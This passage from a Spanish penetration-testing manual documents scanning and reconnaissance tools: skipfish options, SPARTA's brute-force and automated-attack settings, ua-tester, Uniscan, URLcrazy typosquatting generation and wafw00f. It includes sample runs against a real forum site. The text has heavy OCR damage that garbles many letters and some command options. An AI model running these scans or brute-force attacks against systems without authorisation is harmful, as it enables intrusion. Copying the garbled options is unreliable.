propietario de este dominio, lo suficiente como para no preocuparse por la inclusión de contenido 
del dominio cruzado desde esa ubicación. Para suprimir las advertencias, se puede usar la opción 
-B, por ejemplo: 

$ ./skipfish -B .google-analytics.com -B .googleapis.com ...otros parámetros... 

Por defecto, skipfish envía los encabezados HTTP minimalistas para reducir la cantidad de 
intercambio de datos por la red. Sin embargo algunos sitios examinan las cadenas o encabezados de 
User-Agent ordenando rechazar clientes no compatibles. En este caso, se puede usar la opción -b, es 
decir, -b ffox, o -b phone para imitar uno de los 2 navegadores populares. 

Cuando se trata de personalizar las solicitudes HTTP, también se puede usar la opción -H para 
insertar cualquier encabezado adicional no estándar o la opción -L para definir un mapeo 



personalizado entre un dispositivo y una direeeión IP sin pasar por el resolver. La última 
caraeterístiea es partieularmente útil para servicios no lanzados o antiguos. 


Algunos sitios pueden ser demasiado grandes para escanear en un plazo razonable. Si el sitio 
presenta zonas bien definidas, por ejemplo, 100000 usuarios con perfdes casi idénticos como parte 
de una red social, estas ubicaciones específicas pueden ser excluido con las opciones -X o -S. En 
otros casos, es posible que se deba recurrir a otra configuración; 

• la opción -d limita la profimdidad del rastreo a un número específico de subdirectorios; 

• la opción -C limita el número de hijos por directorio; 

• la opción -X limita el número total de descendientes por rama de árbol de rastreo y 

• la opción -r limita el número total de solicitudes a enviar en un escaneo. 

La opción -p es interesante y está disponible para evaluaciones repetidas. Especificando un 
porcentaje entre 1 y 100%, es posible decirle al rastreador a seguir menos del 100% de todos los 
enlaces y probar menos del 100% de todas las entradas del diccionario. Naturalmente esto limita la 
integridad de un escaneo, pero a diferencia de la mayoría de las otras configuraciones, lo hace de 
forma equilibrada, no determinista. 

Es extremadamente útil cuando se está configurando un rastreo, el uso de un límite de tiempo, pero 
esto requiere evaluaciones periódicas de la infraestructura. Otra opción relacionada cpn esta es -q, 
que establece la semilla inicial aleatoria para el rastreador en un valor especificado. Esta se puede 
usar para reproducir exactamente un escaneo anterior para comparar resultados. La aleatoriedad se 
basa principalmente en la opción -p, pero también para hacer un un par de decisiones de gestión de 
escaneo en otro lugar. 

Algunos servicios particularmente complejos o rotos pueden involucrar un número muy alto 
de páginas idénticas o casi idénticas. Aunque estos sucesos son por predeterminado en gris en el 
informe, todavía usan algo de estado de pantalla y se toman un tiempo para procesar en el nivel de 
JavaScript. En estos casos extremos, se puede usar la opción -Q para suprimir por completo los 
informes de nodos duplicados antes de que el informe esté escrito. Esto puede dar una comprensión 
menos integral de como está organizado el sitio, pero no tiene impacto en la cobertura de la prueba. 

En determinadas evaluaciones rápidas, es posible que tampoco tenga interés en tener especial 
atención a la funcionalidad deseada del sitio, con la esperanza de explorar solo secretos no 
vinculados. En tal caso, se puede especificar la opción -P para inhibir todo el análisis HTML. Esto 
limita la cobertura y quita la capacidad para que el escáner aprenda nuevas palabras clave mirando 
el HTML, pero se acelera dramáticamente la prueba. Otra opción igualmente paralizante que reduce 
el riesgo de efectos persistentes de una exploración es -O, que inhibe el análisis de todas las formas 
y pasos de presentación. 

Algunos sitios que manejan datos confidenciales de usuarios se preocupan por obtener bien el SSL. 
Skipfish opcionalmente puede ayudar a resolver contenidos mezclados problemáticos o escenarios 
de envío de contraseña: usar la opción -M para habilitar esto. El escáner se quejará de situaciones 
como http; // Scripts que se cargan en páginas https; //, pero no tendrá en cuenta escenarios que no 
sean de riesgo como las imágenes. 

Del mismo modo, determinados sitios pueden preocupar en los casos en que el almacenamiento en 
caché está restringido en el nivel HTTP/1.1, pero que no exista una directiva de almacenamiento en 
caché HTTP/LO explícita como es el caso del empleo de la opción -E en la línea de comando, que 
hace que skipfish registre todo los casos con cuidado. 



En algunas ocasiones, se desea limitar las solicitudes por segundo para limitar la carga en el 
servidor de destino o posiblemente omitir la proteeción DoS. La opeión -1 se puede utilizar para 
estableeer este límite y el valor dado es la máxima eantidad de solicitudes por segundo que desea 
que skipfish realice. 

Generalmente los escaneos no deberían tomar semanas. En muchos casos, probablemente se desea 
limitar la duraeión del escaneo para que se ajuste dentro de un tiempo determinado. Esto se puede 
haeer con la opción -k, que permite la cantidad de horas, minutos y segundos que se espeeifiearán 
en un formato H: M: S. El uso de esta opeión puede afectar la cobertura de escaneo si el tiempo de 
espera de eseaneo expira antes de probar todas las páginas. 

Por último, en algunas evaluaciones que involueran sitios independientes sin un amplio contenido 
del usuario, el auditor puede preocuparse por cualquier correo eleetrónieo externo o los enlaees 
HTTP vistos, incluso si no tienen un impaeto inmediato en la seguridad. Eísar la opeión -El para 
tener estos valores registrados. 

La gestión del diecionario es un tema espeeial y como ya se mencionó, está cubierto en más detalle 
en doe/dictionary.txt. Algunas de las opeiones relevantes incluyen 

• las opeiones -S y -W ya explicadas, 

• la opción -L para suprimir el aprendizaje automático, 

• la opción -G para limitar el tamaño del jar de adivinanzas de palabras elave, 

• la opeión -R para eliminar las entradas antiguas del diecionario y 

• la opción -Y para inhibir el costoso fuzzing $keyword.$extension. 

Skipfish también presenta un meeanismo de autoeompletado de formularios para maximizar la 
cobertura del eseaneo. Los valores no deben ser maliciosos, ya que no están destinados a 
implementar controles de seguridad, sino más bien para pasar la lógica de validación de entrada. 

Se pueden definir reglas adicionales o anular las existentes, con la opción -T, (-T form field name 
= field value, por ejemplo, -T login = testl23 -T password = test321), aunque tenga en cuenta que 
-C y -A son un método mucho mejor de iniciar sesión. 

También hay un conjunto de opeiones relacionadas con el rendimiento. Usar la opeión -g para 
estableeer el número máximo de conexiones a mantener globalmente en todos los objetivos. Es 
sensible mantener esto por debajo de 50 para evitar abrumar la pila TCP/IP en su sistema o en los 
dispositivos NAT/eortafuegos cercanos y la opción -m para configurar el límite por dirección IP. Se 
sugiere: 2-4 generalmente es bueno para localhost, 4-8 para redes loeales, 10-20 para objetivos 
externos, 30+ para realmente retrasados o hosts non-keep-alive. También se puede usar la opeión -w 
para establecer el tiempo de espera de E/S, es decir, skipfish esperará solo un tiempo para una 
lectura o escritura individual y la opción -t para establecer el tiempo de espera total de la solicitud, 
para tener en cuenta los distintos sitios realmente lentos o muy rápidos. 

Por último la opeión -f controla el número máximo de errores HTTP eonsecutivos que se está 
dispuesto a ver antes de abortar el escaneo y la opeión -s estableee la longitud máxima de una 
respuesta a buscar y analizar. En este caso las respuestas más largas se truncarán. 

Al escanear sitios grandes con mucho contenido multimedia, es posible que también se desee 
espeeificar la opción -e. Esto evita que los doeumentos binarios se guarden en la memoria para fines 
de informes y libera mueha RAM. 

La limitación de veloeidad adicional está disponible a través de herramientas de tereeros de modo 
de usuario como trickle o modelado de tráfico a nivel de kernel. 




Las estadísticas de exploración en tiempo real se pueden suprimir con la opción -u. 


Una exploración estándar y autenticada de un sitio bien diseñado y autónomo que advierte sobre 
todas las cuestiones de los enlaces externos, los correos electrónicos, el contenido mixto y el 
encabezado de almacenamiento en caché, incluida la fuerza bruta suave, se ejecuta con los 
comandos: 

$ touch new_dict.wl 

$ ./skipfish -MEU -S dictionaries/minimal.wl -W new_dict.wl \ -C "AuthCookie=value" 

-X /logout.aspx -o output_dir \ http://www.example.com/ 

Para un escaneo de 5 conexiones, pero sin fuerza bruta, pretendiendo ser MSIE y confiando en el 
contenido de example.com, ejecutar: 

$ ./skipfish -m 5 -L -W- -o output_dir -b ie -B example.com \ http://www.example.com/ 

Si solo se quiere fuerza bruta sin extracción de enlaces HTML, limitado a un solo directorio y 
tiempo de espera después de 5 segundos, ejecutar: 

$ touch new_dict.wl 

$ ./skipfish -S dictionaries/complete.wl -W new_dict.wl \ -P -I http://www.example.com/dirl/ -o 
output_dir -t 5 -I \ http://www.example.com/dirl/ 



52. SPARTA 


SPARTA es una aplicación GUI de python que simplifica las pruebas de penetración de 
infraestructura de red al ayudar al probador de penetración en la fase de exploración y de 
enumeración. Le permite al probador ahorrar tiempo al tener acceso de apuntar y hacer clic a su kit 
de herramientas y al mostrar todos los resultados de la herramienta de una manera conveniente. Si 
se dedica poco tiempo a configurar comandos y herramientas, se puede dedicar más tiempo a 
analizar los resultados. 

Presupone que hay instaladas varias herramientas como nmap, dirbuster, hydra y nikto entre otras. 
Características 

- Ejecuta nmap desde SPARTA o importe la salida XML de nmap. 

- nmap escalonado transparente: obtiene resultados rápidamente y logre una cobertura 
completa. 

- Menú contextual configurable para cada servicio. Puede configurar que ejecutar en los 
servicios descubiertos. Cualquier herramienta que pueda ejecutarse desde un terminal puede 
ejecutarse desde SPARTA. 

- Puede ejecutar cualquier script o herramienta en un servicio en todos los hosts en alcance, 
solo con un clic del mouse. 

- Define tareas automatizadas para servicios (ej. ejecutar nikto en todos los servicios HTTP o 
sslscan en todos los servicios ssl). 

- Verificación de credenciales por defecto para la mayoría de los servicios comunes. Por 
supuesto esto también se puede configurar para ejecutarse automáticamente. 

- Identifica la reutilización de la contraseña en la infraestructura probada. Si Hydra 
encuentra nombres de usuario/contraseñas, estos se almacenan en listas de palabras internas 
que luego se pueden usar en otros destinos en la misma red. 

- Capacidad de marcar hosts en los que ya ha trabajado para que no pierda el tiempo 
mirándolos nuevamente. 

- Capturador de capturas de pantalla del sitio web para que no pierda el tiempo en servidores 
web menos interesantes. 

Uso: SPARTA.py <opciones> 

Opciones 


-h, —help 

Muestra la ayuda y sale 

—cleanup 

Eimpia los archivos intermedios para ahorrar espacio. Ea 
acción por defecto es retener los archivos intermedios. 

—verbose 

Muestra más resultados para cada paso del análisis. 

—noninteractive 

Modo no interactivo 

-threads=THREADS 

Definir el número de threads con los que debe ejecutarse 
SPARTA. El valor predeterminado es 2. 


En SPARTA hay 3 clases de acciones: 

• Acciones de host: se invocan haciendo clic con el botón derecho en un dispositivo y su salida de 
tool se almacenará y se mostrará 

• Acciones de puerto: se invocan haciendo clic con el botón derecho en un puerto o servicio y su 
salida de herramienta se almacenará y se mostrará, por ejemplo: Nikto 




• Acciones de terminal: se invoean haciendo elic eon el botón dereeho en un puerto y generará una 
ventana de terminal externa, por ejemplo: Coneet with eon netcat 


Para eonfigurar una nueva aceión, se debe utilizar el siguiente formato: 

tool=label, eommand, serviees 

donde 

• tool es un identifieador únieo, generalmente el nombre de la herramienta. 

• label es el texto que apareeerá en el menú eontextual. 

• eommand es el eomando que eseribiria en el terminal para ejeeutar la herramienta. Tener en 
euenta que debe ser un eomando no interaetivo. Los mareadores de posieión [IP], 

[PUERTO] y [SALIDA] cuando se usan serán reemplazados en tiempo de ejecueión por los 
valores eorreetos. 

• serviees es la lista de nombres de servieios nmap a los que se apliea la herramienta. Cuando 
haee olio eon el botón derecho en un puerto/servioio, la herramienta solo apareeerá en el 
menú eontextual si el servioio se definió aqui. Tener en cuenta que este oampo no es 
utilizado por las Acciones del host por razones obvias. 

Ejemplo: 

Para eonfigurar la herramienta Nikto oomo una aooión de puerto, neoesitariamos agregar la 

siguiente linea a la seoción [PortActions] en sparta.oonf: 

nikto=Run nikto, nikto -o [OUTPUTj.txt -p [PORT] -h [IP], “http,https” 

Después de realizar oambios en el arohivo de oonfiguraoión, SPARTA debe reinioiarse para que los 
oambios surtan efeoto. Este no será el caso cuando implementemos el menú de oonfiguraoión. 

Configurar ataques automatizados 

Se puede eonfigurar SPARTA para ejeeutar automátioamente oualquier herramienta que haya 
oonfigurado en la sección [PortActions] del archivo de oonfiguraoión ouando se identifioa un 
servioio. 

Eos ataques automátioos están habilitados de manera predeterminada, pero pueden deshabilitarse 
editando la opoión "enable-Soheduler" en la secoión [GeneralSettings] del arohivo de oonfiguraoión. 

Eos ataques automátioos se oonfiguran en la seoción [SchedulerSettings] del arohivo de 
oonfiguraoión. Se debe utilizar el siguiente formato: 

tool=services, protoool 

donde 

• tool es el identifieador únieo que se utilizó para definir la herramienta en la seooión 
[PortAotions]. 

• serviees es la lista de servieios que, ouando se identifioan, deberian aotivar la herramienta 
para que se ejeoute automátioamente. 

• protoool es el protooolo del servioio en el que se debe ejeeutar la herramienta (top / udp). 

Modo interactivo 

En el modo interactivo, en la parte superior de la pantalla hay 2 pestañas 

- Eile. Dentro de esta pestaña hay las opoiones: New, Open, Save, Save as, Add host(s) to soope, 
Import map y Exit 

- Help. Su seleooión abre una página web eon ayuda. 

Debajo en ventana oentral, hay 2 pestañas: Sean y Brute que son las 2 acoiones básioas de sparta. Ea 
primera es la enoargada de realizar los escaneos y la segunda de haoer un ataque de fúerza bruta. 



Debajo a la izquierda hay otras 3 pestañas operativas que son 

- Hosts. Lista de dispositivos que se rastrean. 

- Services. Lista de servicios asociados a los dispositivos anteriores. 

- Tools. Se trat de un identificador único que se utilizó para definir la herramienta en el 
Sección [PortActions]. Esta herramienta puede ser nmap, dirbuster, hydra y nikto entre otras. 

A la derecha la ventana que aparece es consecuencia de los seleccionado en la ventana anterior y en 
ella hay 4 pestañas: 

- Services 

- Scripts 

- Information 

- Notes 

En la parte inferior, aparece una ventana con la pestaña Logs donde se visualiza las acciones que 
está realizando este programa sparta. Consta de 6 columnas 

- Progress. Es un indicador del progreso. 

- Tool. Nombre de la herramienta que se está usando. 

- Host. Dirección IP del dispositivo 

- Start time. Tiempo de inicio del escaneo 

- End time. Tiempo final del escaneo. 

- Status. Estado del escaneo: running, fmished 

En cuanto al ataque de fuerza bruta, se deben especificar los datos siguientes: 

- Dirección IP del dispositivo a atacar 

- Puerto del dispositivo a atacar 

- Servicio a utilizar: ssh, telnet, smtp, smb, etc 

- Try blank password 

- Try login as password 

- Eoop around users 

- Exit on first valid 
-Yerbóse 

- Additional options 

También se puede especificar el nombre de usuario y contraseña a usar o el nombre del fichero 
donde contiene esta información. También hay la posibilidad o no de encontrar npmbres de usuario 
y contraseñas. 



53. Ua-tester 


Esta herramienta está diseñada para verificar automáticamente una URL determinada mediante una 
lista de cadenas de agentes de usuario estándar y no estándar proporcionadas por el usuario, 1 por 
linea. Los resultados de estas verificaciones informan al usuario para un análisis manual adicional 
cuando sea necesario. Los datos recopilados incluyen los códigos de respuesta, la URL resultante en 
el caso de una respuesta 30x, el MD5 y la longitud del cuerpo de la respuesta y selecciona los 
encabezados del servidor. 

Resultados: cuando está en modo no verbose, solo los valores que no coinciden con la conexión de 
referencia inicial se informan al usuario. Si no se muestran resultados para un agente de usuario 
especifico, todos los resultados coinciden con la conexión de referencia inicial. Si se necesita una 
salida completa de todas las comprobaciones, independientemente de las coincidencias con la 
referencia, utilizar el modo verbose. 

Uso: ua-tester [opciones] 

Opciones 


-p PROXY_ADDR:PROXY_PORT, 

—proxy 

Establecer el uso de un proxy. Por defecto ninguno. 

-u / -url TARGET 

URL completa a esc anear 

-f / —file <Path to User Agent file> 

Si no se proporciona ningún archivo, deben estar 
presentes las opciones -d 

-s / —single 

Proporcionar una única cadena de user-agent 

-d / —default 

Seleccionar los tipos de cadena user-agent a verificar. 
Seleccionar 1 o más de las siguientes categorias. 

(M)obile, (D)esktop, mis(C), (T)ools, (B)ots, e(X)treme 

-0 / —output <Path to output fde> 

Resultados en formato CSV 

-V / —verbose 

Se muestran los encabezados completos para cada 
comprobación 

—debug 

Ver mensajes de depuración 


Ejemplo 

ua-tester -u www.example.com -f ./useragentlist.txt -v 
ua-tester -u https://www.wordpress.com 
ua-tester -u http://www.defaultserver.com -v —debug 
ua-tester -u facebook.com -v -d MDBX 

ua-tester -u https://www.google.com -s "MySpecialUserAgent" 
ua-tester -u blog.c22.cc -d MC -o ./output.csv 

root@kali:'-'# ua-tester -u forocoches.com 
[>] Performing initial request and confirming stability 
[>] Using User-Agent string Mozilla/5.0 
[ ] URL (ENTERED): http://forocoches.com 
[!] URL (LINAL): https://www.forocoches.com/ 

[!] Responso Code: 301 Moved Permanently 
[ ] Date: Mon, 11 May 2020 10:04:45 GMT 
[ ] Content-Type: text/html; charset=ISO-8859-l 




[ ] Transfer-Encoding: chunked 
[ ] Connection: cióse 

[ ] Set-Cookie:_cfduid=d3fbc56aeef50ae6a677c5e857de2c35al589191485; expires=Wed, 10- 

Jun-20 10:04:45 GMT; path=/; domain=.forococlies.com; HttpOnly; SameSite=Lax; Secure 
[ ] Set-Cookie: bblastvisit=1589191485; expires=Tue, ll-May-2021 10:04:45 GMT; Max- 
Age=31536000; path=/; domain=.foroeoehes.eom; seeure 

[ ] Set-Cookie: bblastaetivity=0; expires=Tue, ll-May-2021 10:04:45 GMT; Max- 
Age=31536000; path=/; domain=.foroeoehes.eom; seeure 
[ ] Caehe-Control: prívate 
[ ] Pragma: prívate 
[ ] X-Litespeed-Caehe: miss 
[ ] Vary: Aeeept-Eneoding 
[ ] CE-Cache-Status: DYNAMIC 

[ ] Expeet-CT: max-age=604800, report-uri="https://report-uri.eloudflare.eom/edn- 
egi/beaeon/expeet-et" 

[ ] Server: eloudflare 
[ ] CE-RAY: 591bl3de4ad3616d-BCN 

[ ] alt-svc: h3-27=":443"; ma=86400, h3-25=":443"; ma=86400, h3-24=":443"; ma=86400, h3- 
23=":443"; ma=86400 

[ ] ef-request-id: 02a4eabee80000616db687e200000001 
[ ] Data (MD5): bfe8dl2ff21e72d9d901elll7a556a35 

[1] Pass 

[2] Pass 

[3] Pass 

[>] URL appears stable. Beginning test 
[>] Using DEEAULT User-Agent Strings 

[>] Output: [+] Added Headers, [-] Removed Headers, [!] Altered Headers, [ ] No Change 
[>] User-Agent String : Mozilla/5.0 (iPhone; U; CPU like Mae OS X; en) AppleWebKit/420+ 
(KHTML, like Geeko) Version/3.0 Mobile/lA543a Safari/419.3 
[!] URL (PIÑAL): https://m.foroeoehes.com/foro/ 

[!] CP-RAY: 591bl40edb71614f-BCN 
[!] ef-request-id: 02a4eadd420000614f869e2200000001 
[>] User-Agent String : Mozilla/5.0 (iPad; U; CPU iPhone OS 3 2 like Mae OS X; en-us) 
AppleWebKit/531.21.10 (KHTML, like Geeko) Version/4.0.4 Mobile/7B314 Safari/531.21.10 
[!] URL (PIÑAL): https://m.foroooohes.oom/foro/ 

[!] CP-RAY: 591bl41348f4613d-BCN 
[!] ef-request-id: 02a4eae00e0000613dd303d200000001 
[>] User-Agent String : Mozilla/5.0 (Linux; U; Android 2.1-updatel; en-at; HTC Hero 
Build/ERE27) AppleWebKit/530.17 (KHTML, like Geeko) Version/4.0 Mobile Safari/530.17 
[!] URL (PIÑAL): https://m.foroooohes.oom/foro/ 

[!] CP-RAY: 591bl415eod461df-BCN 
[!] ef-request-id: 02a4eaelae000061dflabfa200000001 
[>] User-Agent String : jBrowser-WAP 
[!] URL (PIÑAL): https://m.foroeoehes.eom/foro/ 

[!] CP-RAY: 591bl419181f6197-BCN 
[!] ef-request-id: 02a4eae3afí)00061976B42200000001 
[>] User-Agent String : Nokia7650/1.0 Symbian-QP/6.1 Nokia/2.1 
[!] URL (PIÑAL): https://m.foroooohes.oom/foro/ 

[!] CP-RAY: 591bl41b99956179-BCN 
[!] ef-request-id: 02a4eae54000006179d63e7200000001 
[>] User-Agent String : Mozilla/5.0 (eompatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) 



[!] URL (FINAL): https://m.forocoches.com/foro/ 

[!] CF-RAY: 591bl41e48df614f-BCN 
[!] cf-request-id: 02a4cae6e90000614f842bb200000001 
[>] User-Agent String : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; 
Trident/4.0) 

[!] URL (FINAL): https://m.forocoches.com/foro/ 

[!] CF-RAY: 59IbI42I7a4I6Ia9-BCN 
[!] cf-request-id: 02a4cae8eb00006Ia9e8a7420000000I 
[>] User-Agent String : Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) 
[!] URL (EINAL): https://m.forocoches.com/foro/ 

[!] CE-RAY: 59IbI4242cIf6Ia3-BCN 
[!] cf-request-id: 02a4caea9500006Ia3aI27c20000000I 
[*] HTTPError: HTTP Error 403: Eorbidden 



54. Uniscan 


Uniscan es un escáner de vulnerabilidad de web, archivo local incluido y ejecución remota de 
comandos. 

Uso; uniscan 

Versión GUI: uniscan-gui 

Opciones: 


-h 

Mostar la ayuda 

-u <url> 

Especificar la URL a analizar 

-f<file> 

Lista de URLs 

-b 

Uniscan en segundo plano 

-q 

Habilitar chequeos de directorio 

-w 

Habilitar comprobaciones de archivos 

-e 

Habilitar comprobaciones de robots.txt y sitemap.xml 

-d 

Habilitar controles dinámicos 

-s 

Habilitar controles estáticos 

-r 

Habilitar los controles de stress 

-i <dork> 

Búsqueda de bing 

-0 <dork> 

Búsqueda de Google 

-g 

Eingerprint de la web 

-j 

Eingerprint del servidor 


La forma más básica de usar esta herramienta es darle una URL con la opción -u seguido del 
dominio de interés. 

También podemos realizar huellas digitales más detalladas del servidor mediante la opción -j. Esto 
ejecutará una prueba de ping y traceroute para determinar el estado de conectividad de la red, 
seguido de un nslookup para obtener los registros DNS disponibles. Esta opción también iniciará un 
escaneo de Nmap para descubrir los servicios y puertos abiertos. 

Uniscan también tiene la opción de fingerprint de los servicios web. Usar la opción -g para hacerlo. 
Esto buscará métodos HTTP interesantes, información de errores y cadenas HTML, así como otros 
pequeños detalles que podrían ayudar en el reconocimiento. 

Podemos rastrear los directorios ubicados en el destino configurando la opción -q. 

También podemos habilitar las comprobaciones de archivos con la opción -w. 

Uniscan tiene la capacidad de verificar automáticamente un sitio web para un archivo robots.txt y 
un mapa del sitio utilizando la opción -e. 


Uniscan cargará algunos plugins para realizar comprobaciones dinámicas en el objetivo, 
incluyendo identificación de correo electrónico, detección de puerta trasera y descubrimiento de 




SQL y otros tipos de puntos de inyeeción. Estableeer la opeión -d para haeer esto. Esto puede llevar 
bastante tiempo ejecutar y no siempre funciona correctamente. 


También podemos habilitar algunas comprobaciones estáticas en el destino con la opción -s. Esto 
ejecutará pruebas que detectan archivos locales incluidos, ejecución remota de comandos y ficheros 
remotos incluido vulnerabilidades. 

Además de la herramienta de linea de comandos, Uniscan tiene una GUI. Simplemente escribir 
uniscan-gui en el indicador de terminal para iniciar el programa. A partir de aqui, funciona bastante 
casi lo mismo que en la interfaz de linea de comando. Podemos enumerar la URL de destino y 
cualquier opción que deseemos habilitar, luego presionar "Start sean" para iniciarla. 


Si la ejecución es lenta, se puede realizar de forma individual para cada una de las opciones que se 
ven en esta pantalla, es decir, 

- Check directory 

- Check files 

- Check /robots,txt 

- Dynamic tests 

- Statis tests 

- Stress test 

- Web fingerprint 

- Server fingerprint 

Es importante resaltar que el fichero de registro Eog fde, lo que registra, se va añadiendo, es decir, 
cuando se ejecuta una nueva opción, no se borra lo registrado, sino que se añde al final del fichero. 



55. URLcrazy 


Se trata de una herramienta de OSINT para generar y probar errores tipográficos o variaciones de 
dominio para detectar o realizar ataques tipográficos, secuestro de URL, phishing y espionaje 
corporativo. 

Usos 

• Detectar casos de errores tipográficos que se benefician de errores tipográficos en su nombre 
de dominio 

• Proteger la marca registrando errores tipográficos populares 

• Identificar nombres de dominio tipográficos que recibirán tráfico destinado a otro dominio 

• Realizar ataques de phishing durante una prueba de penetración 

Características 

• Genera 15 tipos de variantes de dominio. 

• Conoce más de 8000 errores ortográficos comunes 

• Admite ataques de volteo de bits 

• Múltiples distribuciones de teclado (qwerty, azerty, qwertz, dvorak) 

• Comprueba si una variante de dominio es válida 

• Prueba si las variantes de dominio están en uso 

• Estima la popularidad de una variante de dominio 

Uso: urlcrazy [opciones] dominio 
Opciones 


-k, —keyboard=LAYOUT 

Eas opciones son: qwerty, azerty, qwertz, dvorak. Por 
defecto: qwerty 

-p, —popularity 

Comprobar la popularidad del dominio con Google 

-r, —no-resolve 

No resolver DNS 

-i, —show-invalid 

Mostrar los nombres de dominio no válidos 

-f, —format=TYPE 

Eegible o CSV. Por defecto: legible 

- 0 , —output=EILE 

Archivo de salida 

-h, —help 

Visualizar la ayuda 

-V, —versión 

Mostrar la información de la versión. 


Soporta las siguientes variaciones de dominio: 

• omisión de caracteres, 

• repetición de caracteres, 

• intercambio de caracteres adyacentes, 

• reemplazo de caracteres adyacentes, 

• doble reemplazo de caracteres, 

• inserción de caracteres adyacentes, 

• puntos faltantes, 

• rayas de rayas, 

• singular o plural. 






• faltas de ortografía comunes, 

• intercambios de vocales, 

• homófonos, 

• cambio de bits, 

• homoglifos, 

• errores dominio de nivel superior, y 

• dominio de segundo nivel equivocado. 

URLCrazy tiene una base de datos de dominios válidos de nivel superior y de segundo nivel. Esta 
información ha sido compilada de Wikipedia y los registradores de dominio. Sabemos si un 
dominio es válido comprobando si coincide con los dominios de nivel superior y de segundo nivel. 
Por ejemplo, www.trademe.co.bz es un dominio válido en Belice que permite cualquier registro de 
dominio de segundo nivel, pero www.trademe.xo.nz no es porque xo.nz no sea un dominio de 
segundo nivel permitido en Nueva Zelanda. 

URLCrazy fue pionero en la técnica de estimar la popularidad relativa de un error tipográfíco a 
partir de datos de resultados de motores de búsqueda. Al medir cuantas veces aparece un error 
tipográfico en las páginas web, podemos estimar la popularidad cuando los usuarios escriban una 
URL. 

La limitación inherente de esta técnica es que un error tipográfíco para un dominio puede ser un 
dominio legitimo por derecho propio. Por ejemplo, googles.com es un error tipográfico de 
google.com pero también es un dominio legitimo. 

Por ejemplo, los siguientes errores ti pográficos para google.com. 


Cantidad 

Tipo 

25424 

gogle.com 

24031 

googel.com 

22490 

gooogle.com 

19172 

googles.com 

19148 

goole.com 

18855 

googl.com 

17842 

ggoogle.com 












56. wafwOOf 


Es la abreviatura de Web Applieation Firewall Deteetion Tool. 

WafWOOf es un script de Python muy útil, capaz de detectar el cortafuegos de la aplicación web. 
Esta herramienta es particularmente útil cuando un probador de penetración quiere inspeccionar el 
servidor de aplicaciones de destino y podría obtener un respaldo de determinadas técnicas de 
evaluación de vulnerabilidades, para las que la aplicación web está activamente protegida por un 
cortafuegos. Por lo tanto, detectar el cortafúegos que se encuentra entre el servidor de aplicaciones 
y el tráfico de Internet no solo mejora la estrategia de prueba, sino que también presenta desafíos 
excepcionales para el probador de penetración para desarrollar avanzadas técnicas de evasión. 

Uso: wafwOOf urll [url2 [url3 ... ]] 

Se pueden escribir una o más URL sepatadas por un espacio en blanco 
Opciones: 


-h, —help 

Mostrar la ayuda y salir 

-V, —verbose 

Modo verbose 

-a, —fmdall 

Encontrar todos los WAF, no dejar de probar en el primero 

-r, —disableredirect 

No seguir las redirecciones dadas por las respuestas 3xx 

-t TEST, -test=TEST 

Prueba para un WAF específico 

-1, —list 

Listar todos los WAFs que somos capaces de detectar 

—xmlrpc 

Encender la interfaz XML-RPC en lugar de GUI 

—xmlrpcport=XMLRPCPORT 

Especificar un puerto alternativo para escuchar, por defecto 
8001 


Ejemplo 

wafwOOf http://forocoches.com 
Checking http://forocoches.com 

The site http://forocoches.com is behind Cloudflare (Cloudfiare Inc.) WAF. 
Number of request: 1 




57. WhatWeb 


WhatWeb identifica los sitios web. Su objetivo es responder a la pregunta "¿Qué es este sitio web?". 
WhatWeb reconoce tecnologias web que incluyen sistemas de administración de contenido (CMS), 
plataformas de blogs, paquetes de estadisticas/análisis, bibliotecas de JavaScript, servidores web y 
dispositivos integrados. WhatWeb tiene más de 1700 plugins, cada uno para reconocer algo 
diferente. WhatWeb también identifica números de versión, direcciones de correo electrónico, ID de 
cuentas, módulos de infraestructura web, errores de SQL y más. 

WhatWeb puede ser sigiloso y rápido o completo pero lento. WhatWeb soporta un nivel de agresión 
para controlar el intercambio entre velocidad y confiabilidad. Cuando visita un sitio web en su 
navegador, la transacción incluye muchos consejos sobre que tecnologias web están impulsando 
este sitio web. Aveces una sola visita a la página web contiene información suficiente para 
identificar un sitio web, pero cuando no lo hace, WhatWeb puede interrogarlo más. El nivel 
predeterminado de agresión, llamado "sigiloso", es el más rápido y solo requiere una solicitud 
HTTP de un sitio web. Esto es adecuado para escanear sitios web públicos. Se desarrollaron modos 
más agresivos para su uso en pruebas de penetración. 

Ea mayoria de los plugins de WhatWeb son exhaustivos y reconocen una serie de señales desde 
sutiles hasta obvios. Por ejemplo, la mayoria de los sitios web de WordPress se pueden identificar 
mediante la etiqueta meta HTME. Pero una minoría de los sitios web de WordPress eliminan esta 
etiqueta de identificación pero esto no impide a WhatWeb identificarlos. El plugin WhatWeb de 
WordPress tiene más de 15 pruebas, que incluyen la verificación del favicon, los archivos de 
instalación predeterminados, las páginas de inicio de sesión y la verificación de "/wp-content/" 
dentro de los enlaces relativos. 

Características: 

* Más de 1700 plugins 

* Controla la compensación entre velocidad/sigilo y confiabilidad 

* Ea optimización del rendimiento. Controla cuantos sitios web escanear simultáneamente. 

* Múltiples formatos de registro: Brief (greppable). Yerbóse (legible por humanos), XME, 
JSON, MagicTree, RubyObject, MongoDB, ElasticSearch, SQE 

* Soporte de proxy que incluye TOR 

* Encabezados HTTP personalizados 

* Autenticación HTTP básica 

* Control sobre la redirección de la página web 

* Rangos de IP de estilo nmap 

* Coincidencia fúzz 

* Plugins personalizados definidos en la linea de comando 
Uso: whatweb [opciones] <URLs> 

Selección del objetivo: 


<TARGETs> 

Introducir direcciones URL, nombres de dispositivo, direcciones 

IP, nombres de archivos o rangos de direcciones IP en formato 
nmap. 

—input-file=PIEE, -i 

Leer los objetivos de un archivo. Se pueden canalizar los nombres 
de dispositivo o URL directamente con -i /dev/stdin. 




Modificación del objetivo: 


—url-prefix 

Agregar un prefijo a las URL de destino. 

—url-suífix 

Agregar un sufijo a las URL de destino. 

—url-pattem 

Insertar los objetivos en una URL. 


Nivel de agresión 

Controla el equilibrio entre veloeidad/sigilo y fiabilidad. 


1 

Sigiloso 

Realiza una solieitud HTTP por destino y también sigue las 
redireeeiones. 

3 

Agresivo 

Si eoineide eon un plugin de nivel 1, se realizarán solieitudes 
adieionales. 

4 

Pesado 

Realiza muehas solieitudes HTTP por destino. Se intentan las 
direeeiones URL de todos los eomplementos. 


Opciones HTTP: 


—user-agent, -U=AGENT 

Identifieaeión de AGENT 

—header, -H 

Añadir un eneabezado HTTP, por ejemplo, "Eoo: Bar". 
Espeeifiear un eneabezado predeterminado que lo reemplazará. 
